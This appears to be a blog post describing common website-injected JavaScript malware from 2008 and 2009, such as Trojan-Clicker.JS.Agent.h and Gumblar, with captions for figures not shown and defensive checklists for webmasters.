Malware of The Year

I just want to say that.. Please be careful if you want to browse over internet. Cybercrime is low risk, since it transcends geo-political borders, it is difficult for law enforcement agencies to catch the perpetrators. Moreover, the costs of conducting cross-border investigations and prosecutions can be high, meaning this is only worth doing in major cases. Secondly, cybercrime is easy : there is extensive documentation on hacking and virus writing freely available on the Internet, meaning that no sophisticated knowledge or skill is required. These are the two main factors which have lead to cybercrime becoming a multi-billion dollar industry, truly a self sustaining eco-system of its own.

Both security companies and software developers wage a constant battle with cybercriminals; their aim is to develop protection for Internet users and software that is secure. Of course, cybercriminals constantly change their tactics in order to combat these countermeasures, and this has resulted in two marked current trends.

First of all, there is the deployment of malware using 0-day vulnerabilities. 0-day vulnerabilities are vulnerabilities for which a patch is not yet available, and they can be used to infect even fully up-to-date computer systems which are not running a dedicated security solution. 0-day vulnerabilities are a valuable commodity due to their potentially serious impact, and they usually sell for tens of thousands of dollars on the black market.

Secondly, we are seeing a spike in the type of malware designed to steal confidential information that can later be sold on the black market. Such information includes credit card numbers, bank account details, passwords for websites such as eBay or PayPal, and even passwords for online games such as World of Warcraft.

==> Here are two tables show the malware most commonly detected on websites in 2008 and 2009.

Top 10 malware in 2008

 

Top 10 malware in 2009

 

In 2008, Trojan-Clicker.JS.Agent.h was found in the vast majority of cases, followed closely by Trojan-Downloader.JS.Iframe.oj. Below the figure..

Page Source source that infected with Trojan-Clicker.JS.Agent.h

Decoded Trojan-Clicker.JS.Agent.h

Trojan-Clicker.JS.Agent.h is a typical example of what most website malware injections looked like in 2008 and still look like in 2009. A small fragment of JavaScript code is added, which is usually obfuscated to prevent analysis. In the code shown above, the obfuscation simply consists of the ASCII characters which form the malicious code being converted into their hex codes. Once decoded, the code is usually an iframe which leads to a website hosting exploits. The IP address will vary and there are many deployment points. The entry page in the malicious website usually hosts exploits for IE, Firefox and Opera. Trojan-Downloader.JS.Iframe.oj, which was the second most common piece of malware, works in a very similar way.

There were two very interesting cases in 2009, the first of which was Net-Worm.JS.Aspxor.a. Although .this malware was detected back in July 2008, in 2009 it became far more widespread. It works by using a kit which finds SQL injection vulnerabilities in websites which are then used to insert malicious iframes.

Another very interesting case is "Gumblar", named after the Chinese domain that was used as an exploitation point. The "gumblar" string, visible in the obfuscated JavaScript which is added to websites, is a clear sign that a website has been compromised.

Typical Gumblar injection in a website

Gumblar script that was decoded

Below is a checklist of actions which need to be taken whenever a website infection is detected :

• Identify everyone who has the website hosting access information, scan their systems with an up-to-date Internet security suite, remove any malware which is detected.
• Change the hosting password to a new, strong one. Strong passwords contain letters, numbers and non-alphanumeric characters to make guessing the password difficult.
• Replace all compromised files with clean copies.
• Identify any backups that might contain infected files and clean them.

For webmasters, here are a few simple tips on how to stay safe :

• Use strong passwords for hosting accounts.
• Use SCP/SSH/SFTP to upload files instead of FTP, this prevents the passwords from being sent in cleartext over the Internet.
• Install and run a security solution.
• Maintain several different backups that can be used to quickly restore the website if it is compromised.

Related posts:

1. Malware to Visitors